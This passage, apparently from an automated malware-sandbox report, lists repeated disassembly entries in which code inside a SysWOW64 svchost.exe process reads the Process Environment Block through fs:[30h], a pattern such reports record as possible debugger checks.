                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034527ED mov eax, dword ptr fs:[00000030h]7_2_034527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034527ED mov eax, dword ptr fs:[00000030h]7_2_034527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034527ED mov eax, dword ptr fs:[00000030h]7_2_034527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034BE7E1 mov eax, dword ptr fs:[00000030h]7_2_034BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034347FB mov eax, dword ptr fs:[00000030h]7_2_034347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034347FB mov eax, dword ptr fs:[00000030h]7_2_034347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034D678E mov eax, dword ptr fs:[00000030h]7_2_034D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034307AF mov eax, dword ptr fs:[00000030h]7_2_034307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034E47A0 mov eax, dword ptr fs:[00000030h]7_2_034E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0344C640 mov eax, dword ptr fs:[00000030h]7_2_0344C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034F866E mov eax, dword ptr fs:[00000030h]7_2_034F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034F866E mov eax, dword ptr fs:[00000030h]7_2_034F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346A660 mov eax, dword ptr fs:[00000030h]7_2_0346A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346A660 mov eax, dword ptr fs:[00000030h]7_2_0346A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03462674 mov eax, dword ptr fs:[00000030h]7_2_03462674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034AE609 mov eax, dword ptr fs:[00000030h]7_2_034AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0344260B mov eax, dword ptr fs:[00000030h]7_2_0344260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0344260B mov eax, dword ptr fs:[00000030h]7_2_0344260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0344260B mov eax, dword ptr fs:[00000030h]7_2_0344260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0344260B mov eax, dword ptr fs:[00000030h]7_2_0344260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0344260B mov eax, dword ptr fs:[00000030h]7_2_0344260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0344260B mov eax, dword ptr fs:[00000030h]7_2_0344260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0344260B mov eax, dword ptr fs:[00000030h]7_2_0344260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03472619 mov eax, dword ptr fs:[00000030h]7_2_03472619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0344E627 mov eax, dword ptr fs:[00000030h]7_2_0344E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03466620 mov eax, dword ptr fs:[00000030h]7_2_03466620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03468620 mov eax, dword ptr fs:[00000030h]7_2_03468620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0343262C mov eax, dword ptr fs:[00000030h]7_2_0343262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346A6C7 mov ebx, dword ptr fs:[00000030h]7_2_0346A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346A6C7 mov eax, dword ptr fs:[00000030h]7_2_0346A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034AE6F2 mov eax, dword ptr fs:[00000030h]7_2_034AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034AE6F2 mov eax, dword ptr fs:[00000030h]7_2_034AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034AE6F2 mov eax, dword ptr fs:[00000030h]7_2_034AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034AE6F2 mov eax, dword ptr fs:[00000030h]7_2_034AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B06F1 mov eax, dword ptr fs:[00000030h]7_2_034B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B06F1 mov eax, dword ptr fs:[00000030h]7_2_034B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03434690 mov eax, dword ptr fs:[00000030h]7_2_03434690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03434690 mov eax, dword ptr fs:[00000030h]7_2_03434690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346C6A6 mov eax, dword ptr fs:[00000030h]7_2_0346C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034666B0 mov eax, dword ptr fs:[00000030h]7_2_034666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03438550 mov eax, dword ptr fs:[00000030h]7_2_03438550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03438550 mov eax, dword ptr fs:[00000030h]7_2_03438550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346656A mov eax, dword ptr fs:[00000030h]7_2_0346656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346656A mov eax, dword ptr fs:[00000030h]7_2_0346656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346656A mov eax, dword ptr fs:[00000030h]7_2_0346656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034C6500 mov eax, dword ptr fs:[00000030h]7_2_034C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03504500 mov eax, dword ptr fs:[00000030h]7_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03504500 mov eax, dword ptr fs:[00000030h]7_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03504500 mov eax, dword ptr fs:[00000030h]7_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03504500 mov eax, dword ptr fs:[00000030h]7_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03504500 mov eax, dword ptr fs:[00000030h]7_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03504500 mov eax, dword ptr fs:[00000030h]7_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03504500 mov eax, dword ptr fs:[00000030h]7_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03440535 mov eax, dword ptr fs:[00000030h]7_2_03440535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03440535 mov eax, dword ptr fs:[00000030h]7_2_03440535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03440535 mov eax, dword ptr fs:[00000030h]7_2_03440535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03440535 mov eax, dword ptr fs:[00000030h]7_2_03440535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03440535 mov eax, dword ptr fs:[00000030h]7_2_03440535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03440535 mov eax, dword ptr fs:[00000030h]7_2_03440535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0345E53E mov eax, dword ptr fs:[00000030h]7_2_0345E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0345E53E mov eax, dword ptr fs:[00000030h]7_2_0345E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0345E53E mov eax, dword ptr fs:[00000030h]7_2_0345E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0345E53E mov eax, dword ptr fs:[00000030h]7_2_0345E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0345E53E mov eax, dword ptr fs:[00000030h]7_2_0345E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346E5CF mov eax, dword ptr fs:[00000030h]7_2_0346E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346E5CF mov eax, dword ptr fs:[00000030h]7_2_0346E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034365D0 mov eax, dword ptr fs:[00000030h]7_2_034365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346A5D0 mov eax, dword ptr fs:[00000030h]7_2_0346A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346A5D0 mov eax, dword ptr fs:[00000030h]7_2_0346A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0345E5E7 mov eax, dword ptr fs:[00000030h]7_2_0345E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0345E5E7 mov eax, dword ptr fs:[00000030h]7_2_0345E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0345E5E7 mov eax, dword ptr fs:[00000030h]7_2_0345E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0345E5E7 mov eax, dword ptr fs:[00000030h]7_2_0345E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0345E5E7 mov eax, dword ptr fs:[00000030h]7_2_0345E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0345E5E7 mov eax, dword ptr fs:[00000030h]7_2_0345E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0345E5E7 mov eax, dword ptr fs:[00000030h]7_2_0345E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0345E5E7 mov eax, dword ptr fs:[00000030h]7_2_0345E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034325E0 mov eax, dword ptr fs:[00000030h]7_2_034325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346C5ED mov eax, dword ptr fs:[00000030h]7_2_0346C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346C5ED mov eax, dword ptr fs:[00000030h]7_2_0346C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03432582 mov eax, dword ptr fs:[00000030h]7_2_03432582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03432582 mov ecx, dword ptr fs:[00000030h]7_2_03432582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03464588 mov eax, dword ptr fs:[00000030h]7_2_03464588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346E59C mov eax, dword ptr fs:[00000030h]7_2_0346E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B05A7 mov eax, dword ptr fs:[00000030h]7_2_034B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B05A7 mov eax, dword ptr fs:[00000030h]7_2_034B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B05A7 mov eax, dword ptr fs:[00000030h]7_2_034B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034545B1 mov eax, dword ptr fs:[00000030h]7_2_034545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034545B1 mov eax, dword ptr fs:[00000030h]7_2_034545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346E443 mov eax, dword ptr fs:[00000030h]7_2_0346E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346E443 mov eax, dword ptr fs:[00000030h]7_2_0346E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346E443 mov eax, dword ptr fs:[00000030h]7_2_0346E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346E443 mov eax, dword ptr fs:[00000030h]7_2_0346E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346E443 mov eax, dword ptr fs:[00000030h]7_2_0346E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346E443 mov eax, dword ptr fs:[00000030h]7_2_0346E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346E443 mov eax, dword ptr fs:[00000030h]7_2_0346E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346E443 mov eax, dword ptr fs:[00000030h]7_2_0346E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034EA456 mov eax, dword ptr fs:[00000030h]7_2_034EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0342645D mov eax, dword ptr fs:[00000030h]7_2_0342645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0345245A mov eax, dword ptr fs:[00000030h]7_2_0345245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034BC460 mov ecx, dword ptr fs:[00000030h]7_2_034BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0345A470 mov eax, dword ptr fs:[00000030h]7_2_0345A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0345A470 mov eax, dword ptr fs:[00000030h]7_2_0345A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0345A470 mov eax, dword ptr fs:[00000030h]7_2_0345A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03468402 mov eax, dword ptr fs:[00000030h]7_2_03468402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03468402 mov eax, dword ptr fs:[00000030h]7_2_03468402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03468402 mov eax, dword ptr fs:[00000030h]7_2_03468402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0342E420 mov eax, dword ptr fs:[00000030h]7_2_0342E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0342E420 mov eax, dword ptr fs:[00000030h]7_2_0342E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0342E420 mov eax, dword ptr fs:[00000030h]7_2_0342E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0342C427 mov eax, dword ptr fs:[00000030h]7_2_0342C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B6420 mov eax, dword ptr fs:[00000030h]7_2_034B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B6420 mov eax, dword ptr fs:[00000030h]7_2_034B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B6420 mov eax, dword ptr fs:[00000030h]7_2_034B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B6420 mov eax, dword ptr fs:[00000030h]7_2_034B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B6420 mov eax, dword ptr fs:[00000030h]7_2_034B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B6420 mov eax, dword ptr fs:[00000030h]7_2_034B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B6420 mov eax, dword ptr fs:[00000030h]7_2_034B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346A430 mov eax, dword ptr fs:[00000030h]7_2_0346A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034304E5 mov ecx, dword ptr fs:[00000030h]7_2_034304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034EA49A mov eax, dword ptr fs:[00000030h]7_2_034EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034364AB mov eax, dword ptr fs:[00000030h]7_2_034364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034644B0 mov ecx, dword ptr fs:[00000030h]7_2_034644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034BA4B0 mov eax, dword ptr fs:[00000030h]7_2_034BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034E4B4B mov eax, dword ptr fs:[00000030h]7_2_034E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034E4B4B mov eax, dword ptr fs:[00000030h]7_2_034E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03502B57 mov eax, dword ptr fs:[00000030h]7_2_03502B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03502B57 mov eax, dword ptr fs:[00000030h]7_2_03502B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03502B57 mov eax, dword ptr fs:[00000030h]7_2_03502B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03502B57 mov eax, dword ptr fs:[00000030h]7_2_03502B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034C6B40 mov eax, dword ptr fs:[00000030h]7_2_034C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034C6B40 mov eax, dword ptr fs:[00000030h]7_2_034C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034D8B42 mov eax, dword ptr fs:[00000030h]7_2_034D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034FAB40 mov eax, dword ptr fs:[00000030h]7_2_034FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03428B50 mov eax, dword ptr fs:[00000030h]7_2_03428B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034DEB50 mov eax, dword ptr fs:[00000030h]7_2_034DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0342CB7E mov eax, dword ptr fs:[00000030h]7_2_0342CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03504B00 mov eax, dword ptr fs:[00000030h]7_2_03504B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034AEB1D mov eax, dword ptr fs:[00000030h]7_2_034AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034AEB1D mov eax, dword ptr fs:[00000030h]7_2_034AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034AEB1D mov eax, dword ptr fs:[00000030h]7_2_034AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034AEB1D mov eax, dword ptr fs:[00000030h]7_2_034AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034AEB1D mov eax, dword ptr fs:[00000030h]7_2_034AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034AEB1D mov eax, dword ptr fs:[00000030h]7_2_034AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034AEB1D mov eax, dword ptr fs:[00000030h]7_2_034AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034AEB1D mov eax, dword ptr fs:[00000030h]7_2_034AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034AEB1D mov eax, dword ptr fs:[00000030h]7_2_034AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0345EB20 mov eax, dword ptr fs:[00000030h]7_2_0345EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0345EB20 mov eax, dword ptr fs:[00000030h]7_2_0345EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034F8B28 mov eax, dword ptr fs:[00000030h]7_2_034F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034F8B28 mov eax, dword ptr fs:[00000030h]7_2_034F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03450BCB mov eax, dword ptr fs:[00000030h]7_2_03450BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03450BCB mov eax, dword ptr fs:[00000030h]7_2_03450BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03450BCB mov eax, dword ptr fs:[00000030h]7_2_03450BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03430BCD mov eax, dword ptr fs:[00000030h]7_2_03430BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03430BCD mov eax, dword ptr fs:[00000030h]7_2_03430BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03430BCD mov eax, dword ptr fs:[00000030h]7_2_03430BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034DEBD0 mov eax, dword ptr fs:[00000030h]7_2_034DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03438BF0 mov eax, dword ptr fs:[00000030h]7_2_03438BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03438BF0 mov eax, dword ptr fs:[00000030h]7_2_03438BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03438BF0 mov eax, dword ptr fs:[00000030h]7_2_03438BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0345EBFC mov eax, dword ptr fs:[00000030h]7_2_0345EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034BCBF0 mov eax, dword ptr fs:[00000030h]7_2_034BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03440BBE mov eax, dword ptr fs:[00000030h]7_2_03440BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03440BBE mov eax, dword ptr fs:[00000030h]7_2_03440BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034E4BB0 mov eax, dword ptr fs:[00000030h]7_2_034E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034E4BB0 mov eax, dword ptr fs:[00000030h]7_2_034E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03436A50 mov eax, dword ptr fs:[00000030h]7_2_03436A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03436A50 mov eax, dword ptr fs:[00000030h]7_2_03436A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03436A50 mov eax, dword ptr fs:[00000030h]7_2_03436A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03436A50 mov eax, dword ptr fs:[00000030h]7_2_03436A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03436A50 mov eax, dword ptr fs:[00000030h]7_2_03436A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03436A50 mov eax, dword ptr fs:[00000030h]7_2_03436A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03436A50 mov eax, dword ptr fs:[00000030h]7_2_03436A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03440A5B mov eax, dword ptr fs:[00000030h]7_2_03440A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03440A5B mov eax, dword ptr fs:[00000030h]7_2_03440A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346CA6F mov eax, dword ptr fs:[00000030h]7_2_0346CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346CA6F mov eax, dword ptr fs:[00000030h]7_2_0346CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346CA6F mov eax, dword ptr fs:[00000030h]7_2_0346CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034DEA60 mov eax, dword ptr fs:[00000030h]7_2_034DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034ACA72 mov eax, dword ptr fs:[00000030h]7_2_034ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034ACA72 mov eax, dword ptr fs:[00000030h]7_2_034ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034BCA11 mov eax, dword ptr fs:[00000030h]7_2_034BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346CA24 mov eax, dword ptr fs:[00000030h]7_2_0346CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0345EA2E mov eax, dword ptr fs:[00000030h]7_2_0345EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03454A35 mov eax, dword ptr fs:[00000030h]7_2_03454A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03454A35 mov eax, dword ptr fs:[00000030h]7_2_03454A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346CA38 mov eax, dword ptr fs:[00000030h]7_2_0346CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03486ACC mov eax, dword ptr fs:[00000030h]7_2_03486ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03486ACC mov eax, dword ptr fs:[00000030h]7_2_03486ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03486ACC mov eax, dword ptr fs:[00000030h]7_2_03486ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03430AD0 mov eax, dword ptr fs:[00000030h]7_2_03430AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03464AD0 mov eax, dword ptr fs:[00000030h]7_2_03464AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03464AD0 mov eax, dword ptr fs:[00000030h]7_2_03464AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346AAEE mov eax, dword ptr fs:[00000030h]7_2_0346AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346AAEE mov eax, dword ptr fs:[00000030h]7_2_0346AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0343EA80 mov eax, dword ptr fs:[00000030h]7_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0343EA80 mov eax, dword ptr fs:[00000030h]7_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0343EA80 mov eax, dword ptr fs:[00000030h]7_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0343EA80 mov eax, dword ptr fs:[00000030h]7_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0343EA80 mov eax, dword ptr fs:[00000030h]7_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0343EA80 mov eax, dword ptr fs:[00000030h]7_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0343EA80 mov eax, dword ptr fs:[00000030h]7_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0343EA80 mov eax, dword ptr fs:[00000030h]7_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0343EA80 mov eax, dword ptr fs:[00000030h]7_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03504A80 mov eax, dword ptr fs:[00000030h]7_2_03504A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03468A90 mov edx, dword ptr fs:[00000030h]7_2_03468A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03438AA0 mov eax, dword ptr fs:[00000030h]7_2_03438AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03438AA0 mov eax, dword ptr fs:[00000030h]7_2_03438AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03486AA4 mov eax, dword ptr fs:[00000030h]7_2_03486AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B0946 mov eax, dword ptr fs:[00000030h]7_2_034B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03504940 mov eax, dword ptr fs:[00000030h]7_2_03504940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03456962 mov eax, dword ptr fs:[00000030h]7_2_03456962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03456962 mov eax, dword ptr fs:[00000030h]7_2_03456962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03456962 mov eax, dword ptr fs:[00000030h]7_2_03456962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0347096E mov eax, dword ptr fs:[00000030h]7_2_0347096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0347096E mov edx, dword ptr fs:[00000030h]7_2_0347096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0347096E mov eax, dword ptr fs:[00000030h]7_2_0347096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034D4978 mov eax, dword ptr fs:[00000030h]7_2_034D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034D4978 mov eax, dword ptr fs:[00000030h]7_2_034D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034BC97C mov eax, dword ptr fs:[00000030h]7_2_034BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034AE908 mov eax, dword ptr fs:[00000030h]7_2_034AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034AE908 mov eax, dword ptr fs:[00000030h]7_2_034AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034BC912 mov eax, dword ptr fs:[00000030h]7_2_034BC912
